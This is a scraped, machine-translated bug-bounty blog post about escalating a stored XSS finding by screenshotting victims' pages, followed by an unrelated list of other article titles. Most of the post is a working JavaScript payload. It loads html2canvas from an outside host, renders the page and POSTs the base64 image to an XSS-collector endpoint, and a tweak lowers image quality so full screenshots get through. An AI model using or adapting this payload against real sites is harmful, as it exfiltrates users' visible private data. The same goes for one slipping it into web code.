12. xss bypass xss screenshot

Others 2021-01-28 07:21:26 views: null

layout: post
title: 12. xss bypass
category: SRC
tags: SRC
keywords: SRC,XSS

Preface

This record is the 12th short article that records the actual src process, and the content is the xssbypass of a website.

Touch typing storage xss

Generally, storing xss will encounter two situations:

  1. If it can be accessed from the public network, the hazard is determined based on the sensitivity of the background, and generally it can reach a high risk.
  2. It is not possible to access the public network. If you hit the cookie, if the harm is not proven, it will generally be in danger.
  3. Wormable user xss, high risk
  4. Ordinary user-level storage xss that is not worm-free, medium-risk

Ways to raise the hazard

For the second case, the conceivable way to increase the damage is to take screenshots of xss.

document.write("<script src=\"https:\/\/xxxxx\/html2canvas.js\"><\/script>");

window.onload = function () {
    
    
    html2canvas(document.body, {
    
    
        onrendered: function (canvas) {
    
    

            //下面开始把抓取到的屏幕图片代码传输和接收,由于代码非常的长,只能使用post
            xhr = function () {
    
    
                var request = false;
                if (window.XMLHttpRequest) {
    
    
                    request = new XMLHttpRequest();
                } else if (window.ActiveXObject) {
    
    
                    try {
    
    
                        request = new window.ActiveXObject('Microsoft.XMLHTTP');
                    } catch (e) {
    
    

                    }
                }

                return request;
            }();

            request = function (method, src, argv, content_type) {
    
    
                xhr.open(method, src, false);
                if (method == 'POST') xhr.setRequestHeader('Content-type', content_type);
                xhr.send(argv); //发送POST数据
                return xhr.responseText;
            };

            attack_a = function () {
    
    
                var src = "https://xxxx/xss.php?do=api&id={projectId}"; //post接收地址
                var argv_0 = "'&screenshot=" + canvas.toDataURL(); //post字段名称为screenshot
                request("POST", src, argv_0, "application/x-www-form-urlencoded");
            };

            attack_a();


        }
    });
}

However, the problem encountered by this platform is that sometimes the image data is too large and there will be less data when converted to base64.
At this time, the complete picture can be transmitted by reducing pixel transmission.

Solution

var fullQuality = canvas.toDataURL("image/jpeg", 1.0);
// data:image/jpeg;base64,/9j/4AAQSkZJRgABAQ...9oADAMBAAIRAxEAPwD/AD/6AP/Z"
var mediumQuality = canvas.toDataURL("image/jpeg", 0.5);
var lowQuality = canvas.toDataURL("image/jpeg", 0.1);

In the final effect, you can still see the user's data clearly.

Afterword

xxxxx

Guess you like

Origin blog.csdn.net/xiru9972/article/details/113114923
xss
Recommended
Ranking
Enter the root node and an integer of a binary tree, and print out all paths where the sum of the node values in the binary tree is the input integer. Pop explanation in.
HTTP, HTTPS, FTP und TCP im Detail erklärt: die Funktionen und Eigenschaften der Protokolle
[Study notes] Berlekamp-Massey
Some insights as a junior front-end developer
[linux command] echo command and usage tips
Verilig-- state machine
Knowing the center point coordinates, angle, half length, and half width of Retangle2, calculate the four vertex coordinates and the midpoint coordinates of the four line segments
【uniapp】Google Maps
Unity uses Camera to make a small map display, and players can reach any location by clicking the small map
algorithmic analysis
Daily
More
2024-07-22(0)
2024-07-21(0)
2024-07-20(0)
2024-07-19(0)
2024-07-18(0)
2024-07-17(0)
2024-07-16(0)
2024-07-15(0)
2024-07-14(0)
2024-07-13(0)

Code World

© 2018 codetd.com